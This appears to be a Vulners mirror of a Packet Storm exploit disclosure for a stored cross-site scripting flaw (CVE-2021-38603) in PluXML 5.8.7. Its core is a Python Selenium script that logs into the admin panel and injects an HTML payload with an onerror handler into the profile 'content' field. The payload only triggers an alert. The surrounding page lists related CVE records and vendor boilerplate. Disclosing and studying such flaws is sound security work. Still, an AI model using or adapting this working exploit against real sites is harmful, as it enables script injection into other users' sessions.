Lucene search
K

PluXML 5.8.7 Cross Site Scripting

🗓️ 13 Aug 2021 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 347 Views

Cross Site Scripting on PluXML 5.8.7 - id_content paramete

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-38603
12 Aug 202100:00
attackerkb
CNNVD
PluXml 跨站脚本漏洞
12 Aug 202100:00
cnnvd
CVE
CVE-2021-38603
12 Aug 202122:05
cve
Cvelist
CVE-2021-38603
12 Aug 202122:05
cvelist
Debian CVE
CVE-2021-38603
12 Aug 202122:05
debiancve
EUVD
EUVD-2021-25043
7 Oct 202500:30
euvd
NVD
CVE-2021-38603
12 Aug 202123:15
nvd
OSV
CVE-2021-38603
12 Aug 202123:15
osv
OSV
UBUNTU-CVE-2021-38603
12 Aug 202123:15
osv
Prion
Cross site scripting
12 Aug 202123:15
prion
Rows per page
`# Exploit Title: XSS-Stored on PluXML 5.8.7 - latest parameter "id_content"  
# Author: nu11secur1ty  
# Testing and Debugging: nu11secur1ty  
# Date: 08.13.2021  
# Vendor: https://pluxml.org/  
# Link: https://sourceforge.net/projects/chikitsa/  
# CVE: CVE-2021-38603  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug and Developement: @nu11secur1ty  
# CVE-2021-38603  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="  
http://192.168.1.120/PluXml/core/admin/auth.php?p=/PluXml/core/admin/"  
  
#enter your login username  
username="nu11"  
  
#enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="login"  
#enter the element for password input field  
element_for_password="password"  
#enter the element for submit button  
element_for_submit="blue"  
  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_class_name(element_for_submit)  
signInButton.click()  
  
## Vulnerability parameter in profil.php "id_content"  
## NOTE: The same problem is in the demo account in the online version  
## https://www.softaculous.com/softaculous/demos/PluXml  
time.sleep(3)  
browser.maximize_window()  
browser.get(("http://192.168.1.120/PluXml/core/admin/profil.php"))  
  
  
## The Exploit  
browser.execute_script("document.querySelector('[name=\"content\"]').value=\"</span><img  
src=  
https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif  
<a href=http://example.com/> onerror=alert(1) /><span>\"")  
  
## submit the exploit  
browser.execute_script("document.querySelector('[name=\"profil\"]').click()")  
  
# exit if you want :D  
browser.close()  
  
print("The payload for CVE CVE-2021-38603 is deployed...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
  
----------------------------------------------------------------------------------------  
  
# Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38603  
# Proof: https://streamable.com/5rf36u  
# BR nu11secur1ty  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Aug 2021 00:00Current
5.2Medium risk
Vulners AI Score5.2
EPSS0.0065
347